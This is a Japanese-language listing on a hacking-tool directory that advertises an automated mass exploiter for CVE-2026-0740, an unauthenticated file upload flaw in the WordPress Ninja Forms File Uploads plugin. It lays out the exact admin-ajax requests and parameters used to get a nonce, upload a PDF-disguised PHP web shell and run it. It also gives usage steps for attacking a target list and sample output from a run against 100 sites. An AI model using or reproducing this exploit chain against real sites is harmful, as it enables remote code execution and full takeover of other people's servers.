Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-0740 — Automated mass exploiter for CVE-2026-0740、Ninja Forms File Uploads プラグインにおける未認証の任意ファイルアップロードを悪用し、細工されたアップロードを介してリモートコード実行を可能にする自動化された大量エクスプロイター。 | Kitploit
ツール/GitHubGitHub/xshadow-here/cve-2026-0740
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubxshadow-here/cve-2026-0740

CVE-2026-0740

Automated mass exploiter for CVE-2026-0740、Ninja Forms File Uploads プラグインにおける未認証の任意ファイルアップロードを悪用し、細工されたアップロードを介してリモートコード実行を可能にする自動化された大量エクスプロイター。

リポジトリを見る
34ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-0740 : Ninja Forms - File Upload <= 3.3.26 認証なし任意ファイルアップロード

説明 :

WordPress用プラグイン「Ninja Forms - File Uploads」は、全バージョン(3.3.26を含む)において、NF_FU_AJAX_Controllers_Uploads::handle_upload 関数にファイルタイプの検証と権限チェックが欠如しているため、認証なしの任意ファイルアップロードに対して脆弱です。

この欠陥により、認証されていない攻撃者は以下を行うことが可能です:

  • 任意の field_id に対して有効なnonceを生成する。
  • ホワイトリストバイパス技術を使用して任意のファイルをアップロードする。
  • ホワイトリストに登録された拡張子(.pdf)からPHP拡張子へのサーバー側リネームを強制する。
  • アップロードされたウェブシェルは以下の場所に保存される: → /wp-content/uploads/ninja-forms/tmp/
  • 影響を受けるサーバー上でリモートコード実行(RCE)を達成する。

情報 : CVE-2026-0740

~ CVSSスコア: 9.8(クリティカル)

~ 影響を受けるバージョン: <= 3.3.26

  • 研究者 :
Sélim Lanouar-(whattheslime)

攻撃ベクトル

root@kitploit:~
ステップ1: nonceを取得する
────────────────────────────────────
POST /wp-admin/admin-ajax.php
データ: action=nf_fu_get_new_nonce&field_id=7&form_id=7

レスポンス: {"success":true,"data":{"nonce":"7a850757a1"}}

              │
              ▼

ステップ2: 偽装ファイルのアップロード + PHPへのリネーム
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
データ:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- [email protected] (ホワイトリスト登録済み拡張子)
- doc_pdf=shadow.php (リネーム先)

              │
              ▼

ステップ3: サーバーが悪意のあるファイルを保存
─────────────────────────────────────
場所: /wp-content/uploads/ninja-forms/tmp/shadow.php
内容: PHPシェル(アップローダー / ウェブシェル)

              │
              ▼

ステップ4: アップロードしたファイルを実行
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
→ ウェブシェルを実行
→ サーバーを完全に乗っ取る
root@kitploit:~
- フィールド実験からの結論:

1. `nf_fu_get_new_nonce` エンドポイントは、フィールドの存在を確認せずに有効なnonceを返す
   → `field_id` と `form_id` パラメータの検証なし(任意のランダムIDで動作)

2. リネーム機能における重大な論理的欠陥
   → プラグインはPOSTパラメータを介してユーザー指定のファイル名を受け入れる
   → リネーム後の最終ファイル拡張子に対する検証なし

3. アップロードされたファイルはWebアクセス可能なディレクトリに直接保存される
   → /wp-content/uploads/ninja-forms/tmp/

4. このツールの所有者はとてもハンサムです

機能 :

  • nonceを自動的に取得
  • デフォルトIDでのエクスプロイト
  • エラーハンドリング
  • 結果をshell.txtに自動保存

使用方法 :

  • ファイル名がlist.txtであり、ディレクトリ内にあることを確認してください
  • python/python3 shadow.py

出力 :

root@kitploit:~
˚⊱🪷⊰˚ NINJA FORMS MASS EXPLOITER ˚⊱🪷⊰˚
 ╰┈➤ 完全なレスポンス表示

[+] 100件のターゲットを読み込みました

[1/100]
😈 [FRISKA RESEARCHER] 攻撃対象: https://example.com
[*] nonceを取得中...
[*] HTTPステータス: 400
[*] レスポンス: 0
[-] HTTPエラー: 400

[2/100]
😈 [FRISKA RESEARCHER] 攻撃対象: https://www.test.com
[*] nonceを取得中...
[*] HTTPステータス: 200
[*] レスポンス: {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] nonce: b0404ec210
[*] シェルをアップロード中...
[*] アップロードレスポンス: {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}

============================================================
🔥 シェルアップローダー: https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================

このツールは教育およびセキュリティテスト目的のみに使用してください。

所有していない、またはテスト許可を得ていないシステムへの不正使用は違法です。

ツールをダウンロード